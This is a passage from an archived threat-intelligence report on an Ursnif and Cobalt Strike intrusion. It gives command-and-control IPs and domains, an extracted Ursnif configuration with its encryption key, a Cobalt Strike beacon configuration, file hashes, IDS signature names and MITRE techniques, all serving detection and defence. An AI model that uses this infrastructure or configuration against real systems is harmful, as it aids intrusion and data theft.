IPs:\r\n5.42.199.83\r\nsuperliner.top\r\n62.173.149.7\r\ninternetlines.in\r\n31.41.44.97\r\nsuperstarts.top\r\n31.41.44.27\r\nsuperlinez.top\r\n31.41.44.27\r\ninternetlined.com\r\n208.91.197.91\r\ndenterdrigx.com\r\n187.190.48.135\r\n210.92.250.133\r\n189.143.170.233\r\n201.103.222.246\r\n151.251.24.5\r\n190.147.189.122\r\n115.88.24.202\r\n211.40.39.251\r\n187.195.146.2\r\n186.182.55.44\r\n222.232.238.243\r\n211.119.84.111\r\n51.211.212.188\r\n203.91.116.53\r\n115.88.24.203\r\n190.117.75.91\r\n181.197.121.228\r\n190.167.61.79\r\n109.102.255.230\r\n211.119.84.112\r\n190.107.133.19\r\n185.95.186.58\r\n175.120.254.9\r\n46.194.108.30\r\n190.225.159.63\r\n190.140.74.43\r\n187.156.56.52\r\n195.158.3.162\r\n138.36.3.134\r\n109.98.58.98\r\n24.232.210.245\r\n222.236.49.123\r\n175.126.109.15\r\n124.109.61.160\r\n95.107.163.44\r\n93.152.141.65\r\n5.204.145.65\r\n116.121.62.237\r\n31.166.129.162\r\n222.236.49.124\r\n211.171.233.129\r\n211.171.233.126\r\n211.53.230.67\r\n196.200.111.5\r\n190.219.54.242\r\n190.167.100.154\r\n110.14.121.125\r\n58.235.189.192\r\n37.34.248.24\r\n110.14.121.123\r\n179.53.93.16\r\n175.119.10.231\r\n211.59.14.90\r\n188.48.64.249\r\n187.232.150.225\r\n186.7.85.71\r\n148.255.20.4\r\n91.139.196.113\r\n41.41.255.235\r\n31.167.236.174\r\n189.165.2.131\r\n1.248.122.240\r\nWe also observed several modules for Ursnif downloaded from the following IP (MD5 hash and file name):\r\n193.106.191.186\r\n 3db94cf953886aeb630f1ae616a2ec25 cook32.rar\r\n d99cc31f3415a1337e57b8289ac5011e cook64.rar\r\n a1f634f177f73f112b5356b8ee04ad19 stilak32.rar\r\n 8ea6ad3b1acb9e7b2e64d08411af3c9a stilak64.rar\r\n 0c5862717f00f28473c39b9cba2953f4 vnc32.rar\r\n ce77f575cc4406b76c68475cb3693e14 vnc64.rar\r\nJoeSandbox reported this sample having the following configuration:\r\n{\r\n \"RSA Public Key\": 
\"WzgHg0uTPZvhLtnG19qpIk+GmHzcoxkfTefSu6gst5n3mxnOBivzR4MH4a6Ax7hZ5fgcuPGt3NKKPbYT\r\n \"c2_domain\": [\r\n \"superliner.top\",\r\n \"superlinez.top\",\r\n \"internetlined.com\",\r\n \"internetlines.in\",\r\n \"medialists.su\",\r\n \"medialists.ru\",\r\n \"mediawagi.info\",\r\n \"mediawagi.ru\",\r\n \"5.42.199.83\",\r\n \"denterdrigx.com\",\r\n \"и\",\r\n \"digserchx.at\"\r\n ],\r\n \"ip_check_url\": [\r\n \"http://ipinfo.io/ip\",\r\n \"http://curlmyip.net\"\r\n ],\r\n \"serpent_key\": \"Jv1GYc8A8hCBIeVD\",\r\n \"tor32_dll\": \"file://c:\\\\test\\\\test32.dll\",\r\n \"tor64_dll\": \"file://c:\\\\test\\\\tor64.dll\",\r\n \"server\": \"50\",\r\n \"sleep_time\": \"1\",\r\n \"SetWaitableTimer_value(CRC_CONFIGTIMEOUT)\": \"60\",\r\n \"time_value\": \"60\",\r\n \"SetWaitableTimer_value(CRC_TASKTIMEOUT)\": \"60\",\r\n \"SetWaitableTimer_value(CRC_SENDTIMEOUT)\": \"300\",\r\n \"SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)\": \"60\",\r\n \"not_use(CRC_BCTIMEOUT)\": \"10\",\r\n \"botnet\": \"3000\",\r\n \"SetWaitableTimer_value\": \"1\"\r\n}\r\nPivoting on domains registered in WHOIS with the email snychkova73@bk.ru or the organization Rus Lak reveals\r\nmany similar domains as seen in this intrusion.\r\nCobalt Strike\r\nThe following Cobalt Strike C2 server was observed:\r\n193.201.9.199:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: [6e:ce:5e:ce:41:92:68:3d:2d:84:e2:5b:0b:a7:e0:4f:9c:b7:eb:7c]\r\nNot Before: 2015/05/20 18:26:24 UTC\r\nNot After: 2025/05/17 18:26:24 UTC\r\nIssuer Org:\r\nSubject Common:\r\nSubject Org:\r\nPublic Algorithm: rsaEncryption\r\nThe following Cobalt Strike configuration was observed:\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n 
\"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"IiuPJ9vfuo3dVZ7son6mSA==\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnCZHWnYFqYB/6gJdkc4MPDTtBJ20nkEAd3tsY4tPKs8M\r\n \"port\": \"443\",\r\n \"hostname\": \"193.201.9.199\"\r\n },\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"kill_date\": null,\r\n \"license_id\": \"1580103824\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/__utm.gif\"\r\n 
},\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}\r\nNote the post_ex spawnto values: both point at rundll32.exe, which matches the rundll32.exe SourceImage in the\r\nSysmon event under Credential Access, as post-exploitation jobs such as credential dumping run in that sacrificial process.\r\nChecking the certificate used reveals that it is the default SSL certificate for Cobalt Strike,\r\n83cd09b0f73c909bfc14883163a649e1d207df22.\r\nAtera \u0026 SplashTop\r\nEven though the threat actor installed these agents, we did not observe any activity with these tools.\r\nExfiltration\r\nSeveral HTTP POST events were observed to the identified domains denterdrigx[.]com, superliner[.]top and\r\n5.42.199[.]83, masquerading as image uploads.\r\nThe user agent ‘Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)’ is an implausible combination:\r\nit claims Internet Explorer 8.0 (released in 2009) on Windows NT 10.0 (Windows 10), which makes it a useful\r\nhunting string.\r\nThe POST event included a MIME part indicating file upload activity:\r\nThe example HTTP stream containing the content:\r\nThe uploaded file 775E.bin was deleted by the injected ‘Explorer.exe’ process from the folder\r\n‘\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp’ on the target endpoint.\r\nThe exfiltration activity along with the beacon activity can be detected using the following network signatures: ET\r\nMALWARE Ursnif Variant CnC Data Exfil and ET MALWARE Ursnif Variant CnC Beacon. In this example, the\r\nmix of activity can be observed as:\r\nImpact\r\nThe threat actor was able to RDP to a backup server using the admin credentials they acquired. 
Using the logs in\r\nMicrosoft-Windows-TerminalServices-LocalSessionManager/Operational we were able to determine the threat\r\nactor spent approximately 10 minutes on the backup server before disconnecting their RDP session. By doing this,\r\nthey revealed the workstation name of the client: WIN-RRRU9REOK18.\r\nLogName=Security\r\nEventCode=4624\r\nEventType=0\r\nComputerName=\u003cREDACTED\u003e\r\nSourceName=Microsoft Windows security auditing.\r\nType=Information\r\nRecordNumber=300297\r\nKeywords=Audit Success\r\nTaskCategory=Logon\r\nOpCode=Info\r\nMessage=An account was successfully logged on.\r\nLogon Information:\r\nLogon Type: 3\r\nRestricted Admin Mode: -\r\nVirtual Account: No\r\nElevated Token: Yes\r\nNetwork Information:\r\nWorkstation Name: WIN-RRRU9REOK18\r\nSource Network Address: \u003cREDACTED\u003e\r\nSource Port: 0\r\nDetailed Authentication Information:\r\nLogon Process: NtLmSsp\r\nAuthentication Package: NTLM\r\nTransited Services: -\r\nPackage Name (NTLM only): NTLM V2\r\nNote that this is a Logon Type 3 (network) event via NtLmSsp rather than the Type 10 (RemoteInteractive) event\r\nusually associated with RDP. This is consistent with Network Level Authentication, where the RDP client\r\npre-authenticates over NTLM before the interactive session is established, and it is that NTLM exchange which\r\nrecords the client workstation name. The session itself is tracked by the LocalSessionManager events 21 (logon),\r\n24 (disconnect) and 25 (reconnect).\r\nDuring that time, the threat actor undertook a number of hands-on keyboard actions; this included reviewing\r\nbackups in a backup console, checking on running tasks, and using notepad to paste in the following content.\r\nProcess execution:\r\nC:\\Program Files\\[redacted]\\Console\\[redacted].exe\r\n\"C:\\Windows\\system32\\taskmgr.exe\" /4\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\USER\\Desktop\\New Text Document.txt\r\nSysmon Copy Paste Collection EID 24:\r\nuser: DOMAIN\\USER ip: 127.0.0.1 hostname: WIN-RRRU9REOK18\r\nIndicators\r\nAtomic\r\nRDP Client Name:\r\nWIN-RRRU9REOK18\r\nUrsnif Domains:\r\ndenterdrigx.com\r\nsuperliner.top\r\ninternetlines.in\r\nsuperstarts.top\r\nsuperlinez.top\r\ninternetlined.com\r\nUrsnif IPs:\r\n62.173.149.7\r\n31.41.44.97\r\n5.42.199.83\r\n31.41.44.27\r\n208.91.197.91\r\n187.190.48.135\r\n210.92.250.133\r\n189.143.170.233\r\n201.103.222.246\r\n151.251.24.5\r\n190.147.189.122\r\n115.88.24.202\r\n211.40.39.251\r\n187.195.146.2\r\n186.182.55.44\r\n222.232.238.243\r\n211.119.84.111\r\n51.211.212.188\r\n203.91.116.53\r\n115.88.24.203\r\n190.117.75.91\r\n181.197.121.228\r\n190.167.61.79\r\n109.102.255.230\r\n211.119.84.112\r\n190.107.133.19\r\n185.95.186.58\r\n175.120.254.9\r\n46.194.108.30\r\n190.225.159.63\r\n190.140.74.43\r\n187.156.56.52\r\n195.158.3.162\r\n138.36.3.134\r\n109.98.58.98\r\n24.232.210.245\r\n222.236.49.123\r\n175.126.109.15\r\n124.109.61.160\r\n95.107.163.44\r\n93.152.141.65\r\n5.204.145.65\r\n116.121.62.237\r\n31.166.129.162\r\n222.236.49.124\r\n211.171.233.129\r\n211.171.233.126\r\n211.53.230.67\r\n196.200.111.5\r\n190.219.54.242\r\n190.167.100.154\r\n110.14.121.125\r\n58.235.189.192\r\n37.34.248.24\r\n110.14.121.123\r\n179.53.93.16\r\n175.119.10.231\r\n211.59.14.90\r\n188.48.64.249\r\n187.232.150.225\r\n186.7.85.71\r\n148.255.20.4\r\n91.139.196.113\r\n41.41.255.235\r\n31.167.236.174\r\n189.165.2.131\r\n1.248.122.240\r\n193.106.191.186\r\nCobalt 
Strike:\r\n193.201.9.199\r\nComputed (MD5, SHA1 and SHA256 per file)\r\n3488164.iso\r\nf7d85c971e9604cc6d2a2ffcac1ee4a3\r\n67175143196c17f10776bdf5fbf832e50a646824\r\ne999890ce5eb5b456563650145308ae837d940e38aec50d2f02670671d472b99\r\n6570872.lnk\r\nc6b605a120e0d3f3cbd146bdbc358834\r\n328afa8338d60202d55191912eea6151f80956d3\r\n16323b3e56a0cbbba742b8d0af8519f53a78c13f9b3473352fcce2d28660cb37\r\nadcomp.bat\r\neb2335e887875619b24b9c48396d4d48\r\nb658ab9ac2453cde5ca82be667040ac94bfcbe2e\r\n4aa4ee8efcf68441808d0055c26a24e5b8f32de89c6a7a0d9b742cce588213ed\r\nalsoOne.bat\r\nc03f5e2bc4f2307f6ee68675d2026c82\r\n4ce65da98f0fd0fc4372b97b3e6f8fbeec32deb3\r\n6a9b7c289d7338760dd38d42a9e61d155ae906c14e80a1fed2ec62a4327a4f71\r\ncanWell.js\r\n6bb867e53c46aa55a3ae92e425c6df91\r\n6d4f1a9658baccd2e406454b2ad40ca2353916ab\r\n5b51bd2518ad4b9353898ed329f1b2b60f72142f90cd7e37ee42579ee1b645be\r\nfirefox.exe\r\n6a4356bd2b70f7bd4a3a1f0e0bfec9a4\r\n485a179756ff9586587f8728e173e7df83b1ffc3\r\n6c5338d84c208b37a4ec5e13baf6e1906bd9669e18006530bf541e1d466ba819\r\nitsIt.db\r\n60375d64a9a496e220b6eb1b63e899b3\r\nd1b2dd93026b83672118940df78a41e2ee02be80\r\n8e570e32acb99abfd0daf62cff13a09eb694ebfa633a365d224aefc6449f97de\r\nor.jpg\r\n60ca7723edd4f3a0561ea9d3a42f82b4\r\n87b699122dacf3235303a48c74fa2b7a75397c6b\r\nbbcceb987c01024d596c28712e429571f5758f67ba12ccfcae197aadb8ab8051\r\ncook32.rar\r\n3db94cf953886aeb630f1ae616a2ec25\r\n743128253f1df9e0b8ee296cfec17e5fc614f98d\r\n1cdbf7c8a45b753bb5c2ea1c9fb2e53377d07a3c84eb29a1b15cdc140837f654\r\ncook64.rar\r\nd99cc31f3415a1337e57b8289ac5011e\r\nf67ce90f66f6721c3eea30581334457d6da23aac\r\nb94810947c33a0a0dcd79743a8db049b8e45e73ca25c9bfbf4bfed364715791b\r\nstilak32.rar\r\na1f634f177f73f112b5356b8ee04ad19\r\n7c82b558a691834caf978621f288af0449400e03\r\nc77ea4ad228ecad750fb7d4404adc06d7a28dbb6a5e0cf1448c694d692598f4f\r\nstilak64.rar\r\n8ea6ad3b1acb9e7b2e64d08411af3c9a\r\n7c04c4567b77981d0d97d8c2eb4ebd1a24053f48\r\ndfdfd0a339fe03549b2475811b106866d035954e9bc002f20b0f69e0f986838f\r\nvnc32.rar\r\n0c5862717f00f28473c39b9cba2953f4\r\n25832c23319fcfe92cde3d443cc731ac056a964a\r\n7ebd70819a79be55d4c92c66e74e90e3309ec977934920aee22cd8d922808c9d\r\nvnc64.rar\r\nce77f575cc4406b76c68475cb3693e14\r\n80fdc4712ae450cfa41a37a24ce0129eff469fb7\r\nf02dc60872f5a9c2fcc9beb05294b57ad8a4a9cef0161ebe008\r\nDetections\r\nNetwork\r\nPotential Impacket wmiexec.py activity\r\nET MALWARE Ursnif Variant CnC Beacon\r\nET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)\r\nET INFO HTTP Request to a *.top domain\r\nET DNS Query to a *.top domain - Likely Hostile\r\nET MALWARE Ursnif Variant CnC Data Exfil\r\nET INFO Dotted Quad Host RAR Request\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET POLICY RDP connection confirm\r\nET POLICY MS Remote Desktop Administrator Login Request\r\nET MALWARE Ursnif Variant CnC Beacon 3\r\nET MALWARE Ursnif Payload Request (cook32.rar)\r\nET MALWARE Ursnif Payload Request (cook64.rar)\r\nET INFO Splashtop Domain (splashtop .com) in TLS SNI\r\nET INFO Splashtop Domain in DNS Lookup (splashtop .com)\r\nSigma\r\nYara\r\nMITRE\r\nMshta - T1218.005\r\nVisual Basic - T1059.005\r\nCompile After Delivery - T1027.004\r\nBITS Jobs - T1197\r\nCredentials from Password Stores - T1555\r\nLSASS Memory - T1003.001\r\nSystem Information Discovery - T1082\r\nProcess Discovery - T1057\r\nDomain Trust Discovery - T1482\r\nMark-of-the-Web Bypass - T1553.005\r\nMalicious File - T1204.002\r\nSystem Time Discovery - T1124\r\nSystem Owner/User Discovery - T1033\r\nRemote System Discovery - T1018\r\nRemote Desktop Protocol - T1021.001\r\nWindows Management Instrumentation - T1047\r\nDomain Account - T1087.002\r\nProcess Injection - 
T1055\r\nAsynchronous Procedure Call - T1055.004\r\nRegistry Run Keys / Startup Folder - T1547.001\r\nRemote Access Software - T1219\r\nWeb Protocols - T1071.001\r\nLateral Tool Transfer - T1570\r\nExfiltration Over C2 Channel - T1041\r\nInternal case #17386\r\nSource: https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 32 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/"
	],
	"report_names": [
		"unwrapping-ursnifs-gifts"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434677,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.pdf",
		"text": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.txt",
		"img": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.jpg"
	}
}